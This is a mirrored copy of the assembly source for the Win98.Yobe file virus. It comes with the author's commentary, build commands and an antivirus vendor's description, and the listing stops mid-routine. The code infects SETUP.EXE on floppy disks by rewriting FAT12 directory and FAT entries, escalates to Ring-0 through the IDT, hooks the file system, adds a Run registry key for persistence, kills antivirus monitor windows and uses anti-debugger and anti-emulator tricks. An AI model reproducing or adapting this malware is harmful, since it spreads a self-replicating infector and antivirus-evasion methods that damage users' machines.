mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
1045 lines
31 KiB
NASM
1045 lines
31 KiB
NASM
?????????????????????????????????????????????????????????????????[yobe.asm]???
|
|
; ??????? ??????? ???????
|
|
; ??? ??? ??? ??? ??? ???
|
|
; Win98.Yobe.24576 ?????? ??????? ???????
|
|
; by Benny/29A ??????? ??????? ??? ???
|
|
; ??????? ??????? ??? ???
|
|
;
|
|
;
|
|
;
|
|
;Author's description
|
|
;?????????????????????
|
|
;
|
|
;Hey reader! R u st0ned or drunk enough? If not, then don't read this, coz this
|
|
;is really crazy. Let me introduce u FIRST FAT12 infector (cluster/directory
|
|
;virus, this is also used to call), fully compatible with windozes (Win98)!
|
|
;No no, that's not enough. This is also resident, multithreaded in both of
|
|
;Ring-0 and Ring-3 levels with anti-debugging, anti-heuristic, anti-emulator and
|
|
;anti-monitor features, using Win9X backdoor to call DOS services and working
|
|
;with CRC32, Windows registry and API functions.
|
|
;Among all these features, I don't hope it has any chances to spread outta
|
|
;world. It infects only diskettes (A: only) and only one file - SETUP.EXE. More
|
|
;crazy than u thought, nah? Yeah, I'm lazy so I didn't want to test my code on
|
|
;my harddisk and I also didn't want to think about infication of more than one
|
|
;file. When I finished Win98.BeGemot, I was totally b0red of those stupid PE
|
|
;headerz, RVAs and such like. I wanted to code something really original, not
|
|
;next average-b0ring virus. I hope I successed. This virus doesn't demonstrate
|
|
;only porting old techniques (c Dir-II virus) to new enviroment, but also
|
|
;hot-new techniques (e.g. Ring0 threads). To be this virus really heavilly
|
|
;armoured is missing some poly/meta engine. Unfortunately, this conception of
|
|
;virus doesn't allow me to implement such engines (neither compression), coz
|
|
;I can't modify virus code. However, I included many usefull trix to fool
|
|
;debuggerz as well as heuristic scannerz. Bad thing is that this babe is
|
|
;detectable by NODICE32 - NODICE32 can find suspicious code (such as modifying
|
|
;IDT) and so it immediately reports an unknown virus. There ain't chance to
|
|
;improve it, coz I can't use any kind of encryption. Fortunately, other AVs
|
|
;find sh!t :D. I hope u will like this piece of work (it took me much time to
|
|
;code it, albeit it is very small (code is small, headerz r huge :) and
|
|
;optimized) and u will learn much from that. U want probably ask me, why I didn't
|
|
;coded stealth virus. U r right, It's easy to implement full-stealth mechanism,
|
|
;but, but, ... I won't lie u - I'm lazy :).
|
|
;Gimme know, if u will have any comments, if u will find any bugs or anything
|
|
;else...thnx.
|
|
;
|
|
;
|
|
;
|
|
;What will happen on execution ?
|
|
;???????????????????????????????-
|
|
;
|
|
;Virus will:
|
|
;1) Setup up SEH frame
|
|
;2) Check for CRC32 of virus body
|
|
;3) Check for application level debugger
|
|
;4) Reset SEH frame and run anti-heuristic code
|
|
;5) Kill some AV monitors (AVP, AMON) + some anti-heuristic code
|
|
;6) Check for SoftICE
|
|
;7) Copy virus to internal buffer, create new Ring-3 thread and wait for
|
|
; its termination
|
|
;8) - Jump to Ring-0 (via IDT)
|
|
;9) - Check for residency and install itself to memory
|
|
;10) - Quit from Ring-0
|
|
;11) Restore host
|
|
;12) Execute host
|
|
;13) Restore host, so host will be infected again
|
|
;14) Set registry key, so virus will be executed everytime windows will
|
|
; start
|
|
;15) Check for payload activation time
|
|
;16) - Do payload
|
|
;17) Remove SEH frame and quit
|
|
;
|
|
;
|
|
;Virus in memory will:
|
|
;1) Check file name
|
|
;2) Create new Ring-0 thread and wait for its termination
|
|
;3) - Check for drive parameters (BOOT sector check)
|
|
;4) - Check for free space (FAT check)
|
|
;5) - Redirect cluster_ptr in directory structure (ROOT)
|
|
;6) - Write virus to the end of DATA area
|
|
;7) - Save back FAT, ROOT and SAVE area (internally used by virus)
|
|
;8) - Terminate Ring-0 thread
|
|
;9) Pass control to next IFS hooker
|
|
;
|
|
;
|
|
;
|
|
;Payload
|
|
;????????
|
|
;
|
|
;In possibility 1:255, virus will show icon on the left side of the screen and
|
|
;will rotate with it. U will c, how light-snake will be rolled on the screen.
|
|
;User will be really impressed! X-D I still can't stop watching it, it really
|
|
;hipnotized me ! :DDDDD.
|
|
;
|
|
;
|
|
;
|
|
;Known bugs
|
|
;???????????
|
|
;
|
|
;My computer will sometimes hang while system will try to read infected file.
|
|
;Maybe old FD drive, maybe some bugz in virus code. This appear only on my
|
|
;computer, so I hope it is error on my side.
|
|
;
|
|
;
|
|
;
|
|
;AVP's description
|
|
;??????????????????
|
|
;
|
|
;Benny's notes: This is much better description than at BeGemot virus. However,
|
|
;I would have some notes, see [* *] marx:
|
|
;
|
|
;
|
|
;Win95.Yobe [* Fully compatible with Win98, so why Win95? *]
|
|
;
|
|
;This is a dangerous [* why dangerous?! *] memory resident parasitic Windows
|
|
;virus. It uses system calls that are valid under Win95/98 only and can't spread
|
|
;under NT. The virus also has bugs and often halts the system when run [* when,
|
|
;where, why? *]. Despite on this the virus has very unusual way of spreading,
|
|
;and it is interesting enough from technical point of view [* I hope it is *].
|
|
;The virus can be found only in two files: "SETUP.EXE" on floppy disks and
|
|
;"SETUP .EXE" in the root of the C: drive (there is one space between file name
|
|
;and ".EXE" extension).
|
|
;
|
|
;On the floppy disks the virus uses a trick to hide its copy. It writes its
|
|
;complete code to the last disk sectors and modifies the SETUP.EXE file to read
|
|
;and execute this code.
|
|
;
|
|
;The infected SETUP.EXE file looks just as 512 bytes DOS EXE program, but it is
|
|
;not. While infecting this file the virus uses "DirII" virus method: by direct
|
|
;disk sectors read/write calls the virus gets access to disk directory sectors,
|
|
;modifies "first file cluster" field and makes necessary changes in disk FAT
|
|
;tables. As a result the original SETUP.EXE code is not modified, but the
|
|
;directory entry points to virus code instead of original file clusters.
|
|
;
|
|
;When the infected SETUP.EXE is run from the affected floppy disk this DOS
|
|
;component of the virus takes control, reads the complete virus body from the
|
|
;last sectors on the floppy disk, then creates the "C:\SETUP .EXE" file, writes
|
|
;these data (complete virus code) to there and executes. The virus installation
|
|
;routine takes control then, installs the virus into the system and disinfect
|
|
;the SETUP.EXE file on the floppy drive.
|
|
;
|
|
;While installing itself into the system the virus creates [* opens *] the new
|
|
;key in the system registry to activate itself on each Windows restart:
|
|
;
|
|
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run
|
|
; YOBE=""C:\SETUP .EXE" YOBE"
|
|
;
|
|
;The virus then switches to the Windows kernel level (Ring0), allocates a block
|
|
;of system memory, copies itself to there and hooks disk file access Windows
|
|
;functions (IFS API). This hook intercepts file opening calls and on opening
|
|
;the SETUP.EXE file on the A: drive the virus infects it.
|
|
;
|
|
;The virus has additional routines. First of them looks for "AVP Monitor" and
|
|
;"Amon Antivirus Monitor" windows and closes them; the second one depending on
|
|
;random counter displays the line with the words "YOBE" to the left side of the
|
|
;screen [* this is usually called as payload :D *].
|
|
;
|
|
;
|
|
;
|
|
;Greetz
|
|
;???????
|
|
;
|
|
; B0z0 - Huh, guy, why don't u stay in VX and write
|
|
; another Padania virus? Just last one ;))
|
|
; Billy Belcebu - Come to .cz! :D
|
|
; BitAddict - Nice to met ya. Kewl to met old TriDenTer.
|
|
; Darkman - Thank u for that wonderful book. It really
|
|
; r0x0r!!!
|
|
; Eddow - Would like to meet ya on IRC!
|
|
; GriYo - Hey man, just reply me once.
|
|
; Itchi - Drink, smoke and fuck again! :) Be back and
|
|
; learn to code, pal!
|
|
; Kaspersky - U cocksucker, where did u lose the description
|
|
; of BeGemot?!!
|
|
; Reptile - Smoke, smoke, smoke. This virus is really
|
|
; st0ned :D. Btw, still working on macro stuph? ;)
|
|
; StarZer0 - Bak infectorz aren't problem :D. Now, when I
|
|
; finished FAT12 inf., I will try to code
|
|
; multithreaded .txt infector ;)))
|
|
; - Fibers r cool, but threads rulez!!!
|
|
; The_Might -\
|
|
; MidNyte - > F0rk me a joint pleeeeeeaaazzzzz! :D
|
|
; Rhape97 -/
|
|
; All-nonsmokerz - Why do u drink and drive, when u can smoke
|
|
; and fly? X-DDD
|
|
; W33D - Thanx for inspiration, this virus is yourz,
|
|
; hehe :D.
|
|
; iKX stuph - Great work, men!!! XiNE#4 r0x0r!
|
|
;
|
|
;
|
|
;
|
|
;How to build
|
|
;?????????????
|
|
;
|
|
;brcc32 yobe.rc
|
|
;tasm32 -ml -q -m9 yobe.asm
|
|
;tlink32 -Tpe -c -x -aa yobe,,, import32,,yobe.res
|
|
;pewrsec yobe.exe
|
|
;
|
|
;
|
|
;
|
|
;Who is YOBE?
|
|
;???????????????????????????
|
|
;
|
|
;Many ppl will now laugh me (hi Darkman!, hi Billy!) :DD. Yobe was human, which
|
|
;role is situated in Bible. Nah, don't beat me, I'm not catholic. I only like
|
|
;stories and ppl in Bible. Yobe was human, which lost his religion. Ehrm,
|
|
;let's imagine it as "he stopped believing in what he believed". Story is all
|
|
;about that u shouldn't stop believe in what u believe. If u believe in better
|
|
;world, don't stop believing in it and do everything to become it truth, don't
|
|
;resignate. This ain't only about catholisism, it's about life and utophy.
|
|
;But NOW pick up your lazy ass and do anything, anything u think it's right,
|
|
;otherwise u won't get what u want!
|
|
;
|
|
;
|
|
;
|
|
;(c) 1999 Benny/29A. Enjoy!
|
|
|
|
|
|
|
|
.386p ;386 protected opcodez
|
|
.model flat ;flat model, 32bit offset
|
|
|
|
|
|
include win32api.inc ;include some structures
|
|
|
|
|
|
PC_WRITEABLE equ 00020000h ;equates used
|
|
PC_USER equ 00040000h ;in installation
|
|
PR_SHARED equ 80060000h ;stage
|
|
PC_PRESENT equ 80000000h
|
|
PC_FIXED equ 00000008h
|
|
PD_ZEROINIT equ 00000001h
|
|
|
|
IFSMgr_GetHeap equ 0040000Dh ;used services
|
|
IFSMgr_Ring0_FileIO equ 00400032h
|
|
IFSMgr_InstallFileSystemApiHook equ 00400067h
|
|
UniToBCSPath equ 00400041h
|
|
VMMCreateThread equ 00010105h
|
|
VMMTerminateThread equ 00010107h
|
|
_VWIN32_CreateRing0Thread equ 002A0013h
|
|
IFSMgr_Ring0_FileIO equ 00400032h
|
|
|
|
|
|
mem_size equ (virus_end-Start+0fffh+24576)/1000h
|
|
;size of virus in memory
|
|
|
|
VxDCall macro VxDService ;macro to call VxDCall
|
|
int 20h
|
|
dd VxDService
|
|
endm
|
|
|
|
|
|
extrn CreateFileA:PROC ;import APIz used by virus
|
|
extrn DeviceIoControl:PROC
|
|
extrn ExitProcess:PROC
|
|
extrn CloseHandle:PROC
|
|
extrn GetModuleFileNameA:PROC
|
|
extrn ReadFile:PROC
|
|
extrn CreateProcessA:PROC
|
|
extrn CopyFileA:PROC
|
|
extrn WaitForSingleObject:PROC
|
|
extrn DeleteFileA:PROC
|
|
extrn CreateThread:PROC
|
|
extrn GetCommandLineA:PROC
|
|
extrn RegCreateKeyExA:PROC
|
|
extrn RegSetValueExA:PROC
|
|
extrn RegCloseKey:PROC
|
|
extrn LoadIconA:PROC
|
|
extrn GetDC:PROC
|
|
extrn DrawIcon:PROC
|
|
extrn IsDebuggerPresent:PROC
|
|
extrn FindWindowA:PROC
|
|
extrn PostMessageA:PROC
|
|
|
|
|
|
|
|
.data ;data section
|
|
VxDName db '\\.\vwin32',0 ;vwin32 driver name
|
|
srcFile db 'a:\setup.exe',0 ;virus locations
|
|
dstFile db 'c:\setup.exe',0 ;on disk
|
|
regFile db '"C:\SETUP .EXE" ' ;in registry
|
|
regVal db 'YOBE',0
|
|
regSize = $-regFile
|
|
subKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
|
|
sICE db '\\.\SICE',0 ;SoftICE driver name
|
|
ShItTyMoNs: ;monitors to kill
|
|
db 'AVP Monitor',0
|
|
db 'Amon Antivirus Monitor',0
|
|
lpsiStartInfo db 64 ;used by CreateProcessA
|
|
db 63 dup (?)
|
|
regCont: ;registers passed to API
|
|
regEBX dd offset ROOT
|
|
regEDX dd 19
|
|
regECX dd 14
|
|
regEAX dd ?
|
|
regEDI dd ?
|
|
regESI dd ?
|
|
regFLGS dd ?
|
|
tmp dd ? ;variable requiered by API
|
|
org tmp
|
|
hKey dd ? ;key to registry
|
|
lppiProcInfo:
|
|
hProcess dd ? ;handle to new process
|
|
hThread dd ? ;handle to new thread
|
|
dwProcessID dd ? ;ID of process
|
|
dwThreadID dd ? ;ID of thread
|
|
vbuffer db 24576 dup (?) ;buffer filled with virus file
|
|
org vbuffer
|
|
fname db 256 dup (?) ;name of virus file
|
|
ends ;end of data section
|
|
|
|
|
|
.code ;code section
|
|
Start: ;virus body starts here
|
|
@SEH_SetupFrame ;setup SEH frame
|
|
mov esi, offset _crc_ ;start of block
|
|
mov edi, crc_end-_crc_ ;size of block
|
|
call CRC32 ;check code integrity
|
|
cmp eax, 0DACA92DCh ;CRC32 match?
|
|
_crc_=$
|
|
jne r_exit ;no, quit (anti-breakpoint)
|
|
call IsDebuggerPresent ;check if any application level
|
|
test eax, eax ;based debugger is present
|
|
jne exit ;yeah, quit - anti-debugger
|
|
mov [eax], ebx ;cause stack overflow exception
|
|
jmp r_exit ;- anti-emulator
|
|
seh_jmp:@SEH_RemoveFrame ;reset SEH handler
|
|
@SEH_SetupFrame ;...
|
|
mov eax, cs ;load CS selector
|
|
xor al, al ;only LSB is set under WinNT
|
|
test eax, eax ;is WinNT active
|
|
je r_exit ;yeah, quit
|
|
db 0d6h ;anti-emulator
|
|
mov eax, esp ;save ESP to EAX
|
|
push cs ;save CS to stack
|
|
pop ebx ;get it back to EBX
|
|
cmp esp, eax ;match?
|
|
jne r_exit ;no, quit - anti-emulator
|
|
|
|
mov eax, fs:[20h] ;get debugger context
|
|
test eax, eax ;is there any?
|
|
jne exit ;yeah, quit - anti-debugger
|
|
|
|
mov esi, offset ShItTyMoNs ;pointer to stringz
|
|
xor edi, edi ;to AV monitors
|
|
push 2 ;2 monitors
|
|
pop ecx ;...
|
|
KiLlMoNs:
|
|
push ecx ;save counter
|
|
push esi ;AV string
|
|
push edi ;NULL
|
|
call FindWindowA ;find window
|
|
test eax, eax ;found?
|
|
je next_mon ;no, try to kill other monitor
|
|
push edi ;now we will send message
|
|
push edi ;to AV window to kill itself
|
|
push 12h ;veeeeeeery stupid X-DD
|
|
push eax
|
|
call PostMessageA ;bye bye, hahaha
|
|
next_mon:
|
|
sub esi, -0ch ;next monitor string
|
|
pop ecx ;restore counter
|
|
loop KiLlMoNs ;kill another one, if present
|
|
|
|
push cs ;store CS
|
|
push offset anti_l ;store offset to code
|
|
retf ;go there - anti-emulator
|
|
|
|
CRC32: push ebx ;I found this code in Int13h's
|
|
xor ecx, ecx ;tutorial about infectin'
|
|
dec ecx ;archives. Int13h found this
|
|
mov edx, ecx ;code in Vecna's Inca virus.
|
|
NextByteCRC: ;So, thank ya guys...
|
|
xor eax, eax ;Ehrm, this is very fast
|
|
xor ebx, ebx ;procedure to code CRC32 at
|
|
lodsb ;runtime, no need to use big
|
|
xor al, cl ;tables.
|
|
mov cl, ch
|
|
mov ch, dl
|
|
mov dl, dh
|
|
mov dh, 8
|
|
NextBitCRC:
|
|
shr bx, 1
|
|
rcr ax, 1
|
|
jnc NoCRC
|
|
xor ax, 08320h
|
|
xor bx, 0edb8h
|
|
NoCRC: dec dh
|
|
jnz NextBitCRC
|
|
xor ecx, eax
|
|
xor edx, ebx
|
|
dec edi
|
|
jne NextByteCRC
|
|
not edx
|
|
not ecx
|
|
pop ebx
|
|
mov eax, edx
|
|
rol eax, 16
|
|
mov ax, cx
|
|
ret
|
|
|
|
anti_l: mov edi, offset sICE ;pointer to SoftICE
|
|
call OpenDriver ;try to open its driver
|
|
jne exit ;SICE present, quit - anti-debugger
|
|
|
|
mov esi, offset fname ;where to store virus filename
|
|
push 256 ;size of filename
|
|
push esi ;ptr to filename
|
|
push 400000h ;base address of virus
|
|
call GetModuleFileNameA ;get virus filename
|
|
test eax, eax ;error?
|
|
je exit ;yeah, quit
|
|
|
|
xor eax, eax
|
|
push eax
|
|
push eax
|
|
push OPEN_EXISTING
|
|
push eax
|
|
push FILE_SHARE_READ
|
|
inc eax
|
|
ror eax, 1
|
|
push eax
|
|
push esi
|
|
call CreateFileA ;open virus file
|
|
inc eax ;error?
|
|
je exit ;yeah, quit
|
|
dec eax
|
|
xchg eax, esi
|
|
push 0
|
|
push offset tmp
|
|
push 24576 ;size of virus file
|
|
push offset vbuffer ;ptr to buffer
|
|
push esi
|
|
call ReadFile ;copy virus file to buffer
|
|
push eax
|
|
push esi
|
|
call CloseHandle ;and close virus file
|
|
pop ecx
|
|
jecxz exit
|
|
|
|
xor eax, eax
|
|
push offset tmp
|
|
push eax
|
|
push eax
|
|
push offset NewThread
|
|
push eax
|
|
push eax ;create new thread and let virus
|
|
call CreateThread ;code continue there
|
|
test eax, eax ;error?
|
|
je exit ;yeah, quit
|
|
mov word ptr [t_patch], 9090h ;allow execution of code -
|
|
push eax ; - anti-emulator
|
|
call CloseHandle ;close handle of thread
|
|
crc_end=$
|
|
e_patch:jmp $ ;this will be patched by thread
|
|
; - anti-emulator
|
|
exit: call GetCommandLineA ;get command-line
|
|
xchg eax, esi ;to esi
|
|
lodsb ;load byte
|
|
cmp al, '"' ;is it " ? If not, virus filename
|
|
jne regSet ;ain't long one - anti-AVer
|
|
lchar: lodsb ;load next byte
|
|
cmp al, '"' ;is it " ?
|
|
jne lchar ;no, continue
|
|
_lchar: lodsb ;load byte
|
|
cmp al, ' ' ;is it space?
|
|
je _lchar ;yeah, continue
|
|
test al, al ;is there any parameter?
|
|
jne regSet ;yeah, virus is loaded from
|
|
;C: drive -> no jump to host
|
|
|
|
mov edi, offset VxDName ;pointer to vwin32
|
|
call OpenDriver ;open driver
|
|
je regSet ;if error, quit
|
|
dec eax
|
|
mov [d_handle], eax ;store handle
|
|
mov eax, offset ROOT ;buffer for reading ROOT
|
|
push eax ;save ptr
|
|
call I25hSimple ;read ROOT
|
|
pop ebp ;get it back
|
|
jc c_exit ;if error, then quit
|
|
|
|
_f_cmp: mov esi, ebp ;get ptr to ROOT
|
|
push esi
|
|
lodsd
|
|
test eax, eax ;ZERO?
|
|
pop esi
|
|
je c_exit ;yeah, no more filez, quit
|
|
|
|
push 11 ;size of filename (8+3)
|
|
pop edi ;to EDI
|
|
call CRC32 ;calculate CRC32
|
|
cmp eax, 873F6A26h ;match?
|
|
je _fn_ok ;yeah, try to restore file
|
|
sub ebp, -20h ;no, get next directory record
|
|
jmp _f_cmp ;and try again
|
|
_fn_ok: mov edi, offset save ;load SAVE area sector from disk
|
|
mov [regEBX], edi
|
|
mov [regEDX], 2880-1 ;SAVE area = last sector in disk
|
|
mov [regECX], 1 ;one sector to read
|
|
call I25h ;read it
|
|
jc c_exit ;if error, then quit
|
|
|
|
push word ptr [ebp+1ah] ;store cluster_ptr
|
|
push dword ptr [ebp+1ch] ;store filesize
|
|
push word ptr [edi] ;restore cluster_ptr
|
|
pop word ptr [ebp+1ah] ;...
|
|
push dword ptr [edi+2] ;restore filesize
|
|
pop dword ptr [ebp+1ch] ;...
|
|
call WriteROOT ;restore directory record
|
|
pop dword ptr [ebp+1ch] ;restore filesize
|
|
pop word ptr [ebp+1ah] ;restore cluster_ptr
|
|
jc c_exit ;if error, then quit
|
|
|
|
mov ebx, offset dstFile ;destination path+filename
|
|
push 0
|
|
push ebx
|
|
push offset srcFile ;source path+filename
|
|
call CopyFileA ;copy virus from A: to C: drive
|
|
xchg eax, ecx ;error?
|
|
jecxz err_cpa ;yeah, quit
|
|
|
|
xor eax, eax
|
|
push offset lppiProcInfo
|
|
push offset lpsiStartInfo
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push ebx
|
|
call CreateProcessA ;execute original file (host)
|
|
xchg eax, ecx ;error?
|
|
jecxz err_cpa ;yeah, quit
|
|
|
|
mov ebp, [hProcess] ;get handle of host process
|
|
push -1 ;wait for its signalisation
|
|
push ebp ;...
|
|
call WaitForSingleObject ;...
|
|
|
|
push ebp
|
|
call CloseHandle ;close handle of host process
|
|
push dword ptr [hThread]
|
|
call CloseHandle ;close handle of host thread
|
|
|
|
err_cpa:call WriteROOT ;restore ROOT
|
|
push ebx
|
|
call DeleteFileA ;and delete host from C: drive
|
|
|
|
c_exit: push 12345678h ;get handle of vwin32 driver
|
|
d_handle = dword ptr $-4
|
|
call CloseHandle ;and close it
|
|
|
|
regSet: push offset tmp
|
|
push offset hKey
|
|
push 0
|
|
push 3
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push offset subKey
|
|
push 80000002h
|
|
call RegCreateKeyExA ;open registry
|
|
test eax, eax
|
|
jne r_exit
|
|
|
|
push regSize
|
|
push offset regFile
|
|
push 1
|
|
push 0
|
|
push offset regVal
|
|
mov ebx, dword ptr [hKey]
|
|
push ebx ;set key - virus will be executed
|
|
call RegSetValueExA ;everytime Windows will start
|
|
push ebx
|
|
call RegCloseKey ;close registry
|
|
|
|
dw 310fh ;RDTCS
|
|
cmp al, 'Y' ;1:255 possibility
|
|
jne r_exit ;payload won't be activated
|
|
|
|
payload:push 0 ;payload will be activated
|
|
call GetDC ;get device context of desktop
|
|
xchg eax, ebx ;save HDC to EBX
|
|
push 29ah ;ID of icon
|
|
push 400000h ;base of virus
|
|
call LoadIconA ;load icon
|
|
xor edx, edx ;EDX=0
|
|
l_payload:
|
|
pushad ;store all registers
|
|
push eax ;icon handle
|
|
push edx ;Y possition
|
|
push 0 ;X possition
|
|
push ebx ;device context handle
|
|
call DrawIcon ;draw icon on desktop
|
|
popad ;restore all registers
|
|
sub edx, -30 ;increment Y possition
|
|
loop l_payload ;long payload :)
|
|
|
|
r_exit: @SEH_RemoveFrame ;remove SEH frame
|
|
push 0
|
|
call ExitProcess ;and exit
|
|
|
|
NewThread:
|
|
pushad ;store all registers
|
|
t_patch:jmp $ ;will be patched - anti-emulator
|
|
call EnterRing0 ;jmp to Ring-0
|
|
pushad ;store all registers
|
|
mov eax, dr0 ;get debug register
|
|
cmp eax, 'YOBE' ;check if we r already resident
|
|
je quitR0 ;yeah, quit
|
|
|
|
push 24576
|
|
VxDCall IFSMgr_GetHeap ;alocate memory for our virus
|
|
pop edx ;correct stack
|
|
xchg eax, edi ;get address to EDI
|
|
test edi, edi ;error?
|
|
je quitR0 ;yeah, quit
|
|
|
|
push edi ;copy virus file to memory
|
|
mov esi, offset vbuffer ;from
|
|
mov ecx, 24576/4 ;how many
|
|
rep movsd ;move!
|
|
pop ebp
|
|
|
|
mov [ebp + 600h+membase-Start], ebp ;save address
|
|
lea eax, [ebp + 600h+NewIFSHandler-Start]
|
|
push eax ;pointer to new handler
|
|
VxDCall IFSMgr_InstallFileSystemApiHook ;install file system hook
|
|
pop edx ;correct stack
|
|
mov [ebp + 600h+OldIFSHandler-Start], eax
|
|
mov eax, 'YOBE' ;mark debug register as "already
|
|
mov dr0, eax ;resident flag" - anti-debugger
|
|
quitR0: mov dword ptr [p_jmp], 90909090h ;patch code - anti-emulator
|
|
popad ;restore all registers
|
|
iretd ;and quit from Ring-0
|
|
|
|
EnterRing0: ;Ring0 port
|
|
pop eax ;get address
|
|
pushad ;store registers
|
|
sidt fword ptr [esp-2] ;load 6byte long IDT address
|
|
popad ;restore registers
|
|
sub edi, -(8*3) ;move to int3
|
|
push dword ptr [edi] ;save original IDT
|
|
stosw ;modify IDT
|
|
inc edi ;move by 2
|
|
inc edi ;...
|
|
push dword ptr [edi] ;save original IDT
|
|
push edi ;save pointer
|
|
mov ah, 0eeh ;IDT FLAGs
|
|
stosd ;save it
|
|
push ds ;save some selectors
|
|
push es ;...
|
|
int 3 ;JuMpToRiNg0!
|
|
pop es ;restore selectors
|
|
pop ds ;...
|
|
pop edi ;restore ptr
|
|
add edi, -4 ;move with ptr
|
|
pop dword ptr [edi+4] ;and restore IDT
|
|
pop dword ptr [edi] ;...
|
|
p_jmp: inc eax ;some silly loop to fool
|
|
cdq ;some AVs. Will be overwritten
|
|
jmp p_jmp ;with NOPs l8r by int handler
|
|
mov word ptr [e_patch], 9090h ;again, new overwriting of code
|
|
popad ; - anti-emulator
|
|
ret ;restore all registers and quit
|
|
|
|
OpenDriver:
|
|
xor eax, eax
|
|
push eax
|
|
push 4000000h
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push edi
|
|
call CreateFileA ;open driver
|
|
inc eax ;increment handle
|
|
ret ;quit
|
|
|
|
NewIFSHandler: ;file system handler
|
|
enter 20h, 0 ;reserve space in stack
|
|
push dword ptr [ebp+1ch] ;for parameters
|
|
push dword ptr [ebp+18h]
|
|
push dword ptr [ebp+14h] ;store parameters
|
|
push dword ptr [ebp+10h] ;for next handler
|
|
push dword ptr [ebp+0ch]
|
|
push dword ptr [ebp+08h]
|
|
|
|
cmp dword ptr [ebp+0ch], 24h ;open?
|
|
jne quitHandler ;no, quit
|
|
|
|
pushad ;store all registers
|
|
call gdlta ;get delta offset
|
|
gdelta: db 0b8h ;prefix - anti-disassembler
|
|
gdlta: pop ebx ;and anti-lamer
|
|
|
|
xor ecx, ecx ;ECX=0
|
|
mov cl, 1 ;ECX=0 or 1
|
|
semaphore = byte ptr $-1
|
|
jecxz exitHandler ;semaphore set? then quit
|
|
mov byte ptr [ebx + semaphore - gdelta], 0
|
|
;set semaphore
|
|
lea edi, [ebx + filename - gdelta] ;get filename
|
|
mov al, [ebp+10h] ;get disk no.
|
|
dec al ;is it A: ?
|
|
jne exitHandler ;no, quit
|
|
mov al, 'A' ;add A letter
|
|
stosb ;store it
|
|
mov al, ':' ;add : letter
|
|
stosb ;store it
|
|
|
|
wegotdrive:
|
|
xor eax, eax
|
|
push eax
|
|
inc ah
|
|
push eax
|
|
mov eax, [ebp+1ch]
|
|
mov eax, [eax+0ch]
|
|
sub eax, -4
|
|
push eax
|
|
push edi
|
|
VxDCall UniToBCSPath ;convert UNICOE filename to ANSI
|
|
sub esp, -10h ;correct shitty stack
|
|
mov byte ptr [edi+eax], 0 ;and terminate filename with \0
|
|
|
|
mov esi, edi
|
|
dec esi
|
|
dec esi
|
|
xchg eax, edi
|
|
inc edi
|
|
inc edi
|
|
inc edi
|
|
call CRC32 ;calculate CRC32 of filename
|
|
cmp eax, 0B4662AD0h ;is it "A:\SETUP.EXE,0" ?
|
|
je setup_exe ;yeah, continue
|
|
|
|
exitHandler:
|
|
mov byte ptr [ebx + semaphore - gdelta], 1 ;set semaphore
|
|
popad ;restore all registers
|
|
quitHandler:
|
|
mov eax, 12345678h
|
|
OldIFSHandler = dword ptr $-4
|
|
call [eax] ;jump to next handler
|
|
sub esp, -18h ;correct stack
|
|
leave
|
|
ret ;and quit
|
|
|
|
setup_exe:
|
|
mov ecx, 1000h ;thread stack
|
|
lea ebx, [ebx + Thread_Infect - gdelta] ;address of thread proc
|
|
xor esi, esi ;next crappy parameter
|
|
VxDCall _VWIN32_CreateRing0Thread ;create new Ring-0 thread
|
|
jmp exitHandler ;and quit
|
|
; - anti-everything
|
|
db 0b8h ;prefix - anti-disassembler
|
|
Thread_Infect: ;Ring-0 thread proc
|
|
pushad ;store all registers
|
|
jmp ti_next ;jump over
|
|
db 3 dup (?) ;leave code be overwritten
|
|
ti_next:call tigdelta ;get delta offset
|
|
ti_gdelta db 0b8h ;next prefix
|
|
tigdelta:
|
|
pop ebx
|
|
xor ecx, ecx
|
|
inc ecx
|
|
lea esi, [ebx + BOOT - ti_gdelta] ;read BOOT sector
|
|
call Int25h
|
|
jc exit_thread
|
|
|
|
cmp [ebx + BOOT+0bh - ti_gdelta], 01010200h ;check, if diskette is
|
|
jne exit_thread ;1,44MB, check FAT and
|
|
cmp word ptr [ebx + BOOT+0fh - ti_gdelta], 0200h;ROOT possition
|
|
jne exit_thread
|
|
push 9
|
|
pop ecx
|
|
cmp word ptr [ebx + BOOT+16h - ti_gdelta], cx ;...
|
|
jne exit_thread ;no, its not 1,44MB FD
|
|
|
|
lea esi, [ebx + FAT - ti_gdelta]
|
|
inc edx
|
|
call Int25h ;read FAT
|
|
cmp byte ptr [esi], 0f0h ;check if it is 1,44MB
|
|
jne exit_thread ;no, quit
|
|
|
|
|
|
lea edi, [ebx + FAT+4223 - ti_gdelta] ;check FAT, if last sectors r
|
|
mov ebp, edi ;free
|
|
xor eax, eax
|
|
sFAT: scasd
|
|
jne exit_thread ;no, quit
|
|
loop sFAT
|
|
|
|
mov edi, ebp ;now we will mark FAT, last
|
|
inc edi ;sectors will be marked as
|
|
mov eax, 0ff0ff00h ;RESERVED
|
|
push 73 ;coz we infect 12bit FAT, we
|
|
pop ecx ;use this loop to mark it so
|
|
markFAT:ror eax, 8
|
|
test al, al
|
|
je markFAT
|
|
stosb
|
|
loop markFAT
|
|
mov byte ptr [edi], 0fh ;mark end
|
|
|
|
call ROOTinit
|
|
call Int25h ;read ROOT
|
|
|
|
f_cmp: mov esi, ebp ;get ptr to ROOT
|
|
push esi
|
|
lodsd
|
|
test eax, eax ;ZERO?
|
|
pop esi
|
|
je exit_thread ;yeah, no more filez, quit
|
|
|
|
push 11
|
|
pop edi
|
|
call CRC32 ;calculate CRC32 of file
|
|
cmp eax, 873F6A26h ;is it SETUP.EXE?
|
|
je fn_ok ;yeah, continue
|
|
sub ebp, -20h ;no, process next directory rec.
|
|
jmp f_cmp ;...
|
|
fn_ok: mov ax, [ebp+1ah] ;save cluster_ptr
|
|
mov [ebx + save - ti_gdelta], ax
|
|
mov eax, [ebp+1ch] ;save filesize
|
|
mov [ebx + save+2 - ti_gdelta], eax
|
|
mov word ptr [ebp+1ah], 2800 ;new cluster_ptr
|
|
mov dword ptr [ebp+1ch], 512 ;new filesize
|
|
|
|
xor ecx, ecx
|
|
inc ecx
|
|
lea esi, [ebx + loader - ti_gdelta]
|
|
mov edx, 2880-49
|
|
call Int26h ;write DOS loader
|
|
|
|
push 42
|
|
pop ecx
|
|
mov esi, [ebx + membase - ti_gdelta]
|
|
mov edx, 2880-48 ;write virus
